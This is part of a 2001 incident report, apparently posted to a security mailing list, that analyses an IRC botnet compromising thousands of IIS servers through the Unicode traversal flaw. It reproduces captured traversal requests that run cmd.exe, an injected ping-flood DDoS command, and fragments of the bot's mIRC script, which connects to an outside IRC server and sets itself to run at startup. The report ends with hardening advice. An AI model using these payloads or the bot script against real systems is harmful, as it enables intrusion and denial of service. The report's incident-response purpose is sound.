192.168.1.180] File does not exist: /usr/sites/ben/htdocs/default/scripts/..Á^Ü../winnt/system32/cmd.exe -------------------------------------------------------------------------- Hosts reported scanning off site: 192.168.1.153 192.168.1.153 192.168.1.213 192.168.1.180 On July 7, the following report was received: -------------------------------------------------------------------------- Date: Sat, 07 Jul 2001 18:29:45 -0400 Subject: Re: [1775] Re: hack attempt from 192.168.1.213 From: XXXXXX To: abuse@site Thank you for the prompt follow-up to my message. In response to the additional information you requested, the clock on my server is set to the eastern daylight time, and is calibrated with Apple's time server. This means the attack occurred at 3.45 am your time, on July 6th. Here is the web log excerpt once again (same as in the first message): 192.168.1.213 - - [06/JUL/2001:06:45:33 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 186 -------------------------------------------------------------------------- The bot on this system has been actively scanning for quite some time, and this status message occurs prior to the report by XXXXXX. -------------------------------------------------------------------------- T 2001/06/06 03:44:18.685984 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :!scan status.. T 2001/06/06 03:44:19.273885 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 208.32.8.164][Port: 80][Found: 1279]..:Scanner[24]!~Powerat_private 0 PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 24.20.93.125][Port: 80][Found: 16 55].. -------------------------------------------------------------------------- At this point, it is up to 2934 vulnerable systems. At 00:15:31 on July 6, someone on the host 10.20.1.1 uploads a set of new programs to the host 192.168.16.108: -------------------------------------------------------------------------- T 2001/06/06 00:38:34.043659 10.20.1.1:3210 -> 192.168.1.213:12624 [AP] password.. T 2001/06/06 00:38:35.567124 10.20.1.1:3210 -> 192.168.1.213:12624 [AP] *?!?PL. T 2001/06/06 00:38:38.827927 10.20.1.1:3210 -> 192.168.1.213:12624 [AP] *?!?CM001B0110.2. T 2001/06/06 00:38:48.360328 10.20.1.1:3211 -> 192.168.1.213:4836 [AP] 0000004923C:\wins.ava. T 2001/06/06 00:38:48.538066 10.20.1.1:3211 -> 192.168.1.213:4836 [A] alias connect { .server dysfunction-1.mine.nu 6667 }..on 1:start:{.. run hexplore.exe /hide mIRC*..writeini c:\winnt\win.ini windows run $m ircexe...timerwriteini 0 30 writeini c:\winnt\win.ini windows run $mir cexe.. nick Scanner[208].. .server dysfunction-1.mine.nu 6667.. .ti merconnect 0 30 connect..write -c webservers.txt..if (%scanning != don e) { .http 208.1.1.1 | halt }..}..on 1:connect:{.. timerconnect off.. join #XXXXXX %key..}..on 1:disconnect:{.. server dysfunction-1.mine.nu 6667.. .timerconnect 0 30 connect..}..on 1:t . . . -------------------------------------------------------------------------- This shows the uploading of files found on other systems, in this case "wins.ava". The word "password" is also seen as the key value in the "remote.ini" file shown earlier. The file upload protocol thus uses 12684/tcp to initiate the transfer, followed by the file contents being sent on 4836/tcp. Around midnight on the morning of July 6, XXXXX is talking with XXXXXXX about their scanning efforts. XXXXX makes an estimate of how long the scanning will take: -------------------------------------------------------------------------- T 2001/06/06 00:13:41.244701 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :XXXXX!~XXXXXXat_private PRIVMSG #XXXX :and it will take them 24 hours to scan the whole ip range.. -------------------------------------------------------------------------- A few minutes later, XXXXX checks the status and sees they have detected "almost 1000" vulnerable Windows IIS servers. -------------------------------------------------------------------------- T 2001/06/06 00:58:54.622797 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :!scan status.. T 2001/06/06 00:58:54.821043 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :Scanner[24]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 2 4.4.84.108][Port: 80][Found: 319].. T 2001/06/06 00:58:55.156010 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 208.5.220.86][Port: 80][Found: 320].. T 2001/06/06 00:59:03.677652 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :almost 1000.. T 2001/06/06 00:59:09.126971 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :and we aren't even close. . T 2001/06/06 00:59:15.598770 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :we are gonna own more tha n we though.. T 2001/06/06 00:59:19.374231 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :i bet 100thousand.. T 2001/06/06 01:00:21.989645 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :!scan status.. T 2001/06/06 01:00:22.580477 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 208.6.23.6][Port: 80][Found: 323]..:Scanner[24]!~Powerat_private P RIVMSG #XXXXXX :[SCAN][Status: ][IP: 24.4.120.131][Port: 80][Found: 336]. . -------------------------------------------------------------------------- Four hours later he checks again and the number is now over 5000... -------------------------------------------------------------------------- T 2001/06/06 05:53:48.655820 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :Scanner[24]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 2 4.32.138.95][Port: 80][Found: 2794]..:Scanner[208]!~Powerat_private 3 PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 208.52.239.2][Port: 80][Found: 24 86].. -------------------------------------------------------------------------- Eleven hours after they first discussed the scanning, the total is up to 7106: -------------------------------------------------------------------------- T 2001/06/06 11:32:30.030794 10.40.4.4:6667 -> 192.168.1.213:2696 [AP] :Scanner[129]!~Power@XXXXXXXXXXXXXXXXXXXXXXXXXX PRIVMSG #XXXXXX :[SCAN][S tatus: ][IP: 129.3.238.195][Port: 80][Found: 34]..:Scanner[128]!~Power @XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX PRIVMSG #XXXXXX :[SCAN][Status: ][IP : 128.4.245.228][Port: 80][Found: 67]..:Scanner[24]!~Power@XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 24.65.82.4 2][Port: 80][Found: 3580]..:Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[SCAN][Status: ][IP: 208.105.156.156][Port: 80][Found: 3425].. -------------------------------------------------------------------------- Cleaned up, the hosts logged to be scanning from the at this time are: -------------------------------------------------------------------------- XXXXXXXXXXXXXXXXXX [IP: 129.1.12.219][Port: 80][Found: 0] XXXXXXXXXXXXXXXXXX [IP: 128.3.176.105][Port: 80][Found: 67] XXXXXXXXXXXXXXXXXX [IP: 24.63.61.129 ][Port: 80][Found: 3580] XXXXXXXXXXXXXXXXXX [IP: 65.95.111.222][Port: 80][Found: 4080] -------------------------------------------------------------------------- The total as of 11:32:29 is up to 7727. It is estimated that during this period, responses (most failures or error messages) were received from 388428 web servers off site. (It is not yet known how many attempted connections were made.) On July 8, 2001, a DDoS attack can be seen sourced from 192.168.1.225: -------------------------------------------------------------------------- T 2001/06/08 02:20:09.406262 10.80.8.8:2585 -> 192.168.1.225:80 [AP] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+" -t"+"-l"+30000+10.10.10.10+"-n"+9999+"-w"+10.. I 2001/06/08 02:20:09.430676 192.168.1.225 -> 10.10.10.10 8:0 7303@0:1480 ...c....abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnop qrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopq rstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqr stuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrs tuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrst uvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstu vwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuv wabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvw abcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwa bcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwab cdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabc defghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcd efghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcde fghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdef ghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefg hijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefgh ijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghi jklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghij klmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijk lmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijkl mnopqrstuvwabcdefghijklmnopqrstuvwabcdefghijklmnopqrstuvwabcdefghi.... .......... -------------------------------------------------------------------------- The following report was recieved on July 8: -------------------------------------------------------------------------- Date: Sun, 8 Jul 2001 18:29:54 -0700 (PDT) Message-Id: <200107090129.f691Tsa32678@site> To: abuse@site From: someone@othersite Subject: attack . . . Problem or question: I believe a computer at your site was used to compromise a web server located at ... After reviewing the web server logs, I found the follow repeated entry: 2001-07-06 09:28:18 192.168.1.180 - GET /scripts/..\../winnt/system32/cmd.exe 200 - - - A DNS lookup suggests that IP 192.168.1.180 is a computer on the XXXX's network. It appears that someone is exploiting a well-known vulnerability in the IIS web server. The hacker was successfull, as some files were successfully uploaded to the machine (mirc32.exe). -------------------------------------------------------------------------- The host reported to be scanning was scanning that IP range (24.0.0.0/8) at the time (although it was not being logged), so this likely does correlate: -------------------------------------------------------------------------- XXXXXXXXXXXXXXXXX [IP: 24.63.61.129 ][Port: 80][Found: 3580] -------------------------------------------------------------------------- Successful exploitation of the Windows IIS Unicode vulnerability during scanning results in a directory listing from the web server. These look like the following (as seen using "ngrep"): -------------------------------------------------------------------------- # ngrep -q -I 192.168.1.22.0706-0708.dump "Volume in drive" | less input: 192.168.1.22.0706-0708.dump T 24.1.2.196:80 -> 192.168.16.108:3821 [AP] HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Fri, 06 Jul 2001 04: 10:26 GMT..Content-Type: application/octet-stream..Volume in drive C h as no label...Volume Serial Number is 7C24-D411.... T 24.1.2.192:80 -> 192.168.16.108:3817 [AP] HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Fri, 06 Jul 2001 06: 50:58 GMT..Content-Type: application/octet-stream..Volume in drive C h as no label...Volume Serial Number is 047C-3309.... T 24.1.4.197:80 -> 192.168.16.108:4330 [AP] HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Fri, 06 Jul 2001 07: 06:49 GMT..Content-Type: application/octet-stream..Volume in drive C h as no label...Volume Serial Number is 0CFD-B8DA.... T 24.1.5.198:80 -> 192.168.16.108:4585 [AP] HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Fri, 06 Jul 2001 07: 13:44 GMT..Content-Type: application/octet-stream..Volume in drive C h as no label...Volume Serial Number is CC72-B0EE.... . . . -------------------------------------------------------------------------- Using this signature, a count of the entries logged from traffic to/from a limited subset of the known compromised systems results in a count of 9106 off-site systems compromised: -------------------------------------------------------------------------- # ngrep -q -I 192.168.1.22.0706-0708.dump "Volume in drive" | grep " -> " | awk '{ print $2;}' | sed "s/:80//" | sort | uniq > exploited-iis # wc -l exploited-iis 9106 exploited-iis -------------------------------------------------------------------------- The logs examined do not include traffic to/from two of four hosts known to be scanning, so the 9106 figure is likely an undercount of compromises resulting from scanning activity on these systems. On July 10, XXXXX reported another DDoS attack, this time involving 44 systems. The target was XXXXXXXXXXXX, and the total outbound flow rate exceeded 50 Mbps for over two hours. In all, the following systems have been identified as scanning, relaying IRC traffic, or involved in DDoS attacks: [71 hosts deleted] Prevention ---------- CERT Advisory 2001-11 contains information on preventative measures: http://www.cert.org/advisories/CA-2001-11.html In addition, XXXXXX relayed the following preventative measures for IIS servers to pass along to administrators. -------------------------------------------------------------------------- There are a couple of simple steps that NT admins should take that will significantly increase the "degree of difficulty" in compromising NT boxes - doing these things can at least reduce the number of incidents we respond to: 1. On an IIS server, always change the location of the inetpub directory and it's subordinates (wwwroot, ftproot, etc.) from the default (C:\InetPub) to a different logical partition. The "../.." attack's syntax is not capable of changing drives to access %SystemRoot%\system32. 2. Restrict anonymous access to the registry. This greatly reduces the amount of information available to a non-authenticated user about the target system. To do this in Windows 2000: a. In Administrative Tools, open Local Security Policy. b. In the Tree Window, expand Local Policies and choose Security Options. c. Double-click "Additional restrictions for anonymous connections". d. In the Local Policy Setting dropdown, choose "No access without explicit anonymous permissions". In Windows NT 4, a registry hack needs to be applied: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA Value: REG_DWORD RestrictAnonymous = 1 There are some consequences to using the anonymous restrictions, which mostly apply to Domain Controllers. Use of these settings on DC's requires that the admin read up on them. -------------------------------------------------------------------------- -- Dave Dittrich Computing & Communications dittrichat_private University Computing Services http://staff.washington.edu/dittrich University of Washington PGP key http://staff.washington.edu/dittrich/pgpkey.txt Fingerprint FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5 ----- End forwarded message ----- -- Elias Levy SecurityFocus.com http://www.securityfocus.com/ Si vis pacem, para bellum ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Aug 09 2001 - 13:33:32 PDT